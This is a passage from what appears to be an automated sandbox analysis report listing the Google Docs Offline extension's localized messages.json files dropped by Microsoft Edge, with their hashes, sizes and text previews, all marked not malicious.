Preview:	{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	858
Entropy (8bit):	4.474411340525479
Encrypted:	false
SSDEEP:	12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
MD5:	34D6EE258AF9429465AE6A078C2FB1F5
SHA1:	612CAE151984449A4346A66C0A0DF4235D64D932
SHA-256:	E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
SHA-512:	20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
Malicious:	false
Preview:	{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\is\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	954
Entropy (8bit):	4.631887382471946
Encrypted:	false
SSDEEP:	12:YGXU2rOcxGe+J97f9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95MwP9KkJ+je:YwBrD2J2DBLMfFuWvdpY94vioO+uh
MD5:	1F565FB1C549B18AF8BBFED8DECD5D94
SHA1:	B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
SHA-256:	E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
SHA-512:	A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
Malicious:	false
Preview:	{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	899
Entropy (8bit):	4.474743599345443
Encrypted:	false
SSDEEP:	12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
MD5:	0D82B734EF045D5FE7AA680B6A12E711
SHA1:	BD04F181E4EE09F02CD53161DCABCEF902423092
SHA-256:	F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
SHA-512:	01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\iw\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2230
Entropy (8bit):	3.8239097369647634
Encrypted:	false
SSDEEP:	24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
MD5:	26B1533C0852EE4661EC1A27BD87D6BF
SHA1:	18234E3ABAF702DF9330552780C2F33B83A1188A
SHA-256:	BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
SHA-512:	450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
Malicious:	false
Preview:	{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1160
Entropy (8bit):	5.292894989863142
Encrypted:	false
SSDEEP:	24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
MD5:	15EC1963FC113D4AD6E7E59AE5DE7C0A
SHA1:	4017FC6D8B302335469091B91D063B07C9E12109
SHA-256:	34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
SHA-512:	427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ka\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3264
Entropy (8bit):	3.586016059431306
Encrypted:	false
SSDEEP:	48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
MD5:	83F81D30913DC4344573D7A58BD20D85
SHA1:	5AD0E91EA18045232A8F9DF1627007FE506A70E0
SHA-256:	30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
SHA-512:	85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
Malicious:	false
Preview:	{"createnew":{"message":"\u10d0\u10ee\u10da\u10d8\u10e1 \u10e8\u10d4\u10e5\u10db\u10dc\u10d0"},"explanationofflinedisabled":{"message":"\u10d7\u10e5\u10d5\u10d4\u10dc \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10ee\u10d0\u10e0\u10d7. Google Docs-\u10d8\u10e1 \u10d8\u10dc\u10e2\u10d4\u10e0\u10dc\u10d4\u10e2\u10d7\u10d0\u10dc \u10d9\u10d0\u10d5\u10e8\u10d8\u10e0\u10d8\u10e1 \u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10d2\u10d0\u10db\u10dd\u10e1\u10d0\u10e7\u10d4\u10dc\u10d4\u10d1\u10da\u10d0\u10d3 \u10d2\u10d0\u10d3\u10d0\u10d3\u10d8\u10d7 \u10de\u10d0\u10e0\u10d0\u10db\u10d4\u10e2\u10e0\u10d4\u10d1\u10d6\u10d4 Google Docs-\u10d8\u10e1 \u10db\u10d7\u10d0\u10d5\u10d0\u10e0 \u10d2\u10d5\u10d4\u10e0\u10d3\u10d6\u10d4 \u10d3\u10d0 \u10e9\u10d0\u10e0\u10d7\u10d4\u10d7 \u10ee\u10d0\u10d6\u10d2\u10d0\u10e0\u10d4\u10e8\u10d4 \u10e1\u10d8\u10dc\u10e5\u10e0\u10dd\u10dc\u10d8\u10d6\u10d0\u10ea\u10d8\u10d0, \u10e0\u10dd\u10d3\u10d4\u10e1\u10d0\u10ea \u10e8\u10d4\u10db\u10d3\u10d2\u10dd\u10

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\kk\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3235
Entropy (8bit):	3.6081439490236464
Encrypted:	false
SSDEEP:	96:H3E+6rOEAbeHTln2EQ77Uayg45RjhCSj+OyRdM7AE9qdV:HXcR/nQXUayYV
MD5:	2D94A58795F7B1E6E43C9656A147AD3C
SHA1:	E377DB505C6924B6BFC9D73DC7C02610062F674E
SHA-256:	548DC6C96E31A16CE355DC55C64833B08EF3FBA8BF33149031B4A685959E3AF4
SHA-512:	F51CC857E4CF2D4545C76A2DCE7D837381CE59016E250319BF8D39718BE79F9F6EE74EA5A56DE0E8759E4E586D93430D51651FC902376D8A5698628E54A0F2D8
Malicious:	false
Preview:	{"createnew":{"message":"\u0416\u0410\u04a2\u0410\u0421\u042b\u041d \u0416\u0410\u0421\u0410\u0423"},"explanationofflinedisabled":{"message":"\u0421\u0456\u0437 \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u043d\u0434\u0435\u0441\u0456\u0437. Google Docs \u049b\u043e\u043b\u0434\u0430\u043d\u0431\u0430\u0441\u044b\u043d \u0436\u0435\u043b\u0456 \u0431\u0430\u0439\u043b\u0430\u043d\u044b\u0441\u044b\u043d\u0441\u044b\u0437 \u049b\u043e\u043b\u0434\u0430\u043d\u0443 \u04af\u0448\u0456\u043d, \u043a\u0435\u043b\u0435\u0441\u0456 \u0436\u043e\u043b\u044b \u0436\u0435\u043b\u0456\u0433\u0435 \u049b\u043e\u0441\u044b\u043b\u0493\u0430\u043d\u0434\u0430, Google Docs \u043d\u0435\u0433\u0456\u0437\u0433\u0456 \u0431\u0435\u0442\u0456\u043d\u0435\u043d \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043b\u0435\u0440 \u0431\u04e9\u043b\u0456\u043c\u0456\u043d \u043a\u0456\u0440\u0456\u043f, \u043e\u0444\u043b\u0430\u0439\u043d \u0440\u0435\u0436\u0438\u043c\u0456\u

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\km\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3122
Entropy (8bit):	3.891443295908904
Encrypted:	false
SSDEEP:	96:/OOrssRU6Bg7VSdL+zsCfoZiWssriWqo2gx7RRCos2sEeBkS7Zesg:H5GRZlXsGdo
MD5:	B3699C20A94776A5C2F90AEF6EB0DAD9
SHA1:	1F9B968B0679A20FA097624C9ABFA2B96C8C0BEA
SHA-256:	A6118F0A0DE329E07C01F53CD6FB4FED43E54C5F53DB4CD1C7F5B2B4D9FB10E6
SHA-512:	1E8D15B8BFF1D289434A244172F9ED42B4BB6BCB6372C1F300B01ACEA5A88167E97FEDABA0A7AE3BEB5E24763D1B09046AE8E30745B80E2E2FE785C94DF362F6
Malicious:	false
Preview:	{"createnew":{"message":"\u1794\u1784\u17d2\u1780\u17be\u178f\u200b\u1790\u17d2\u1798\u17b8"},"explanationofflinedisabled":{"message":"\u17a2\u17d2\u1793\u1780\u200b\u1782\u17d2\u1798\u17b6\u1793\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f\u17d4 \u178a\u17be\u1798\u17d2\u1794\u17b8\u200b\u1794\u17d2\u179a\u17be Google \u17af\u1780\u179f\u17b6\u179a\u200b\u1794\u17b6\u1793\u200b\u200b\u178a\u17c4\u1799\u200b\u200b\u1798\u17b7\u1793\u1798\u17b6\u1793\u200b\u200b\u200b\u17a2\u17ca\u17b8\u1793\u1792\u17ba\u178e\u17b7\u178f \u179f\u17bc\u1798\u200b\u200b\u1791\u17c5\u200b\u1780\u17b6\u1793\u17cb\u200b\u1780\u17b6\u179a\u200b\u1780\u17c6\u178e\u178f\u17cb\u200b\u1793\u17c5\u200b\u179b\u17be\u200b\u1782\u17c1\u17a0\u1791\u17c6\u1796\u17d0\u179a Google \u17af\u1780\u179f\u17b6\u179a \u1793\u17b7\u1784\u200b\u1794\u17be\u1780\u200b\u1780\u17b6\u179a\u1792\u17d2\u179c\u17be\u200b\u179f\u1798\u1780\u17b6\u179b\u1780\u1798\u17d2\u1798\u200b\u200b\u200b\u1782\u17d2\u1798\u17b6\u1793

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\kn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1880
Entropy (8bit):	4.295185867329351
Encrypted:	false
SSDEEP:	48:SHYGuEETiuF6OX5tCYFZt5GurMRRevsY4tVZIGnZRxlKT6/UGG:yYG8iuF6yTCYFH5GjLPtVZVZRxOZZ
MD5:	8E16966E815C3C274EEB8492B1EA6648
SHA1:	7482ED9F1C9FD9F6F9BA91AB15921B19F64C9687
SHA-256:	418FF53FCA505D54268413C796E4DF80E947A09F399AB222A90B81E93113D5B5
SHA-512:	85B28202E874B1CF45B37BA05B87B3D8D6FE38E89C6011C4240CF6B563EA6DA60181D712CCE20D07C364F4A266A4EC90C4934CC8B7BB2013CB3B22D755796E38
Malicious:	false
Preview:	{.. "createnew": {.. "message": "........ .....".. },.. "explanationofflinedisabled": {.. "message": ".... ..................... ......... ............. Google ...... ....., Google ...... ............ ............... .... ..... ...... .... .... ............ ............. ........ ..... ... .....".. },.. "explanationofflineenabled": {.. "message": ".... ...................., .... .... .... ......... ........... ............ .... ........ .........."..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1042
Entropy (8bit):	5.3945675025513955
Encrypted:	false
SSDEEP:	24:1HAWYsF4dqNfBQH49Hk8YfIhYzTJ+6WJBtl/u4s+6:ZF4wNfvm87mX4LF6
MD5:	F3E59EEEB007144EA26306C20E04C292
SHA1:	83E7BDFA1F18F4C7534208493C3FF6B1F2F57D90
SHA-256:	C52D9B955D229373725A6E713334BBB31EA72EFA9B5CF4FBD76A566417B12CAC
SHA-512:	7808CB5FF041B002CBD78171EC5A0B4DBA3E017E21F7E8039084C2790F395B839BEE04AD6C942EED47CCB53E90F6DE818A725D1450BF81BA2990154AFD3763AF
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".. ...".. },.. "explanationofflinedisabled": {.. "message": ".... ...... ... .. .. Google Docs. ..... Google Docs .... .... .... .... .... ..... . .... .... ..... ......".. },.. "explanationofflineenabled": {.. "message": ".... ...... ... .. ... ... ..... ... ... .. . .....".. },.. "extdesc": {.. "message": ".... .... ... .., ...... . ....... .., .., ......".. },.. "extname": {.. "message": "Google Docs ....".. },.. "learnmore": {.. "message": "... ....".. },.. "popuphelptext": {.. "message": "... .. ... .... ..... .... .... .....

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\lo\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2535
Entropy (8bit):	3.8479764584971368
Encrypted:	false
SSDEEP:	48:YRcHe/4raK1EIlZt1wg62FIOg+xGaF8guI5EP9I2yC:+cs4raK1xlZtOgviOfGaF8RI5EP95b
MD5:	E20D6C27840B406555E2F5091B118FC5
SHA1:	0DCECC1A58CEB4936E255A64A2830956BFA6EC14
SHA-256:	89082FB05229826BC222F5D22C158235F025F0E6DF67FF135A18BD899E13BB8F
SHA-512:	AD53FC0B153005F47F9F4344DF6C4804049FAC94932D895FD02EEBE75222CFE77EEDD9CD3FDC4C88376D18C5972055B00190507AA896488499D64E884F84F093
Malicious:	false
Preview:	{"createnew":{"message":"\u0eaa\u0ec9\u0eb2\u0e87\u0ec3\u0edd\u0ec8"},"explanationofflinedisabled":{"message":"\u0e97\u0ec8\u0eb2\u0e99\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ea2\u0eb9\u0ec8. \u0ec0\u0e9e\u0eb7\u0ec8\u0ead\u0ec3\u0e8a\u0ec9 Google Docs \u0ec2\u0e94\u0e8d\u0e9a\u0ecd\u0ec8\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94, \u0ec3\u0eab\u0ec9\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e81\u0eb2\u0e99\u0e95\u0eb1\u0ec9\u0e87\u0e84\u0ec8\u0eb2\u0ec3\u0e99\u0edc\u0ec9\u0eb2 Google Docs \u0ec1\u0ea5\u0ec9\u0ea7\u0ec0\u0e9b\u0eb5\u0e94\u0ec3\u0e8a\u0ec9\u0e81\u0eb2\u0e99\u0e8a\u0eb4\u0ec9\u0e87\u0ec1\u0e9a\u0e9a\u0ead\u0ead\u0e9a\u0ea5\u0eb2\u0e8d\u0ec3\u0e99\u0ec0\u0e97\u0eb7\u0ec8\u0ead\u0e95\u0ecd\u0ec8\u0ec4\u0e9b\u0e97\u0eb5\u0ec8\u0e97\u0ec8\u0eb2\u0e99\u0ec0\u0e8a\u0eb7\u0ec8\u0ead\u0ea1\u0e95\u0ecd\u0ec8\u0ead\u0eb4\u0e99\u0ec0\u0e95\u0eb5\u0ec0\u0e99\u0eb1\u0e94."},"explanationofflineenabled":{"message":"\u0e97\u0ec

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1028
Entropy (8bit):	4.797571191712988
Encrypted:	false
SSDEEP:	24:1HAivZZaJ3Rje394+k7IKgpAJjUpSkiQjuRBMd:fZZahBeu7IKgqeMg
MD5:	970544AB4622701FFDF66DC556847652
SHA1:	14BEE2B77EE74C5E38EBD1DB09E8D8104CF75317
SHA-256:	5DFCBD4DFEAEC3ABE973A78277D3BD02CD77AE635D5C8CD1F816446C61808F59
SHA-512:	CC12D00C10B970189E90D47390EEB142359A8D6F3A9174C2EF3AE0118F09C88AB9B689D9773028834839A7DFAF3AAC6747BC1DCB23794A9F067281E20B8DC6EA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SUKURTI NAUJ.".. },.. "explanationofflinedisabled": {.. "message": "Esate neprisijung.. Jei norite naudoti .Google. dokumentus be interneto ry.io, pagrindiniame .Google. dokument. puslapyje eikite . nustatym. skilt. ir .junkite sinchronizavim. neprisijungus, kai kit. kart. b.site prisijung. prie interneto.".. },.. "explanationofflineenabled": {.. "message": "Esate neprisijung., bet vis tiek galite redaguoti pasiekiamus failus arba sukurti nauj..".. },.. "extdesc": {.. "message": "Redaguokite, kurkite ir per.i.r.kite savo dokumentus, skai.iuokles ir pristatymus . visk. darykite be prieigos prie interneto.".. },.. "extname": {.. "message": ".Google. dokumentai neprisijungus".. },.. "learnmore": {.. "message": "Su.inoti daugiau".. },.. "popuphelptext": {.. "message": "Ra.ykite, redaguokite ir bendradarbiaukite bet kurioje vietoje naudodami interneto ry.. arba

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	994
Entropy (8bit):	4.700308832360794
Encrypted:	false
SSDEEP:	24:1HAaJ7a/uNpoB/Y4vPnswSPkDzLKFQHpp//BpPDB:7J7a/uzQ/Y4vvswhDzDr/LDB
MD5:	A568A58817375590007D1B8ABCAEBF82
SHA1:	B0F51FE6927BB4975FC6EDA7D8A631BF0C1AB597
SHA-256:	0621DE9161748F45D53052ED8A430962139D7F19074C7FFE7223ECB06B0B87DB
SHA-512:	FCFBADEC9F73975301AB404DB6B09D31457FAC7CCAD2FA5BE348E1CAD6800F87CB5B56DE50880C55BBADB3C40423351A6B5C2D03F6A327D898E35F517B1C628C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "IZVEIDOT JAUNU".. },.. "explanationofflinedisabled": {.. "message": "J.s esat bezsaist.. Lai lietotu pakalpojumu Google dokumenti bez interneta savienojuma, n.kamaj. reiz., kad ir izveidots savienojums ar internetu, atveriet Google dokumentu s.kumlapas iestat.jumu izv.lni un iesl.dziet sinhroniz.ciju bezsaist..".. },.. "explanationofflineenabled": {.. "message": "J.s esat bezsaist., ta.u varat redi..t pieejamos failus un izveidot jaunus.".. },.. "extdesc": {.. "message": "Redi..jiet, veidojiet un skatiet savus dokumentus, izkl.jlapas un prezent.cijas, neizmantojot savienojumu ar internetu.".. },.. "extname": {.. "message": "Google dokumenti bezsaist.".. },.. "learnmore": {.. "message": "Uzziniet vair.k".. },.. "popuphelptext": {.. "message": "Rakstiet, redi..jiet un sadarbojieties ar interneta savienojumu vai bez t. neatkar.gi no t., kur atrodaties.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\ml\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2091
Entropy (8bit):	4.358252286391144
Encrypted:	false
SSDEEP:	24:1HAnHdGc4LtGxVY6IuVzJkeNL5kP13a67wNcYP8j5PIaSTIjPU4ELFPCWJjMupV/:idGcyYPVtkAUl7wqziBsg9DbpN6XoN/
MD5:	4717EFE4651F94EFF6ACB6653E868D1A
SHA1:	B8A7703152767FBE1819808876D09D9CC1C44450
SHA-256:	22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
SHA-512:	487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
Malicious:	false
Preview:	{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\mn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2778
Entropy (8bit):	3.595196082412897
Encrypted:	false
SSDEEP:	48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
MD5:	83E7A14B7FC60D4C66BF313C8A2BEF0B
SHA1:	1CCF1D79CDED5D65439266DB58480089CC110B18
SHA-256:	613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
SHA-512:	3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
Malicious:	false
Preview:	{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

C:\Users\user\AppData\Local\Temp\scoped_dir3452_584081962\CRX_INSTALL\_locales\mr\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1719
Entropy (8bit):	4.287702203591075
Encrypted:	false
